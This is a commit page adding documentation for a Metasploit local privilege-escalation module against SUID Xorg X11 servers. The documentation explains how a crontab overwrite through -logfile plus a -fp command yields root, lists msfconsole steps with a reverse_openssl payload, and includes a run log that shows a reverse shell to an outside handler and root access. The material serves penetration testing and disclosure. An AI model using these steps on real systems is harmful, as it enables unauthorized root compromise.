Initial documentation for Xorg Privesc Module
killed white spacesGSoC/Meterpreter_Web_Console
parent
ef7fc783be
commit
538055c406
|
@ -0,0 +1,86 @@
|
|||
## Description
|
||||
|
||||
This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This flaw allows users to write over existing files on the system. This exploit backs up crontab and then uses -logfile to overwrite it. A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
|
||||
|
||||
Xorg is more restrictive to exploit under CentOS. The user must have console lock and SeLinux may interfere.
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* OpenBSD 6.3
|
||||
* OpenBSD 6.4
|
||||
* CentOS 7.5.1084 x86_64
|
||||
|
||||
|
||||
## Verification Steps
|
||||
On CentOS your session must have console lock. To get a console lock you can login locally with a user.
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Get a session
|
||||
3. Do: `use exploit/multi/local/xorg_x11_suid_server`
|
||||
4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
|
||||
5. Do: `set SESSION [SESSION]`
|
||||
6. Do: `set LHOST [LHOST]`
|
||||
7. Do: `run`
|
||||
8. You should get a new *root* session
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**SESSION**
|
||||
|
||||
Which session to use, which can be viewed with `sessions`
|
||||
|
||||
## Advanced Options
|
||||
|
||||
**Xdisplay**
|
||||
|
||||
Display to use for Xorg (default: `:1`)
|
||||
|
||||
**WritableDir**
|
||||
|
||||
A writable directory file system path. (default: `/tmp`)
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(multi/local/xorg_x11_suid_server) > run
|
||||
|
||||
[!] SESSION may not be compatible with this module.
|
||||
[*] Started reverse double SSL handler on 172.30.0.2:4444
|
||||
[+] Passed all initial checks for exploit
|
||||
[*] Uploading your payload, this could take a while
|
||||
[*] Trying /etc/crontab overwrite
|
||||
[+] /etc/crontab overwrite successful
|
||||
[*] Waiting on cron to run
|
||||
[*] Waiting on cron to run
|
||||
[*] Waiting on cron to run
|
||||
[*] Waiting on cron to run
|
||||
[*] Waiting on cron to run
|
||||
[*] Waiting on cron to run
|
||||
[*] Waiting on cron to run
|
||||
[*] Waiting on cron to run
|
||||
[*] Accepted the first client connection...
|
||||
[*] Accepted the second client connection...
|
||||
[*] Command: echo t2XWfcWkZHevLPS8;
|
||||
[*] Writing to socket A
|
||||
[*] Writing to socket B
|
||||
[*] Reading from sockets...
|
||||
[*] Reading from socket B
|
||||
[*] B: "t2XWfcWkZHevLPS8\n"
|
||||
[*] Matching...
|
||||
[*] A is input...
|
||||
[*] Command shell session 2 opened (172.30.0.2:4444 -> 172.30.0.99:41253) at 2018-11-12 15:06:39 -0600
|
||||
[+] Returning session after cleaning
|
||||
[+] Deleted /tmp/.session-odRjfx
|
||||
|
||||
id
|
||||
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
|
||||
```
|
Loading…
Reference in New Issue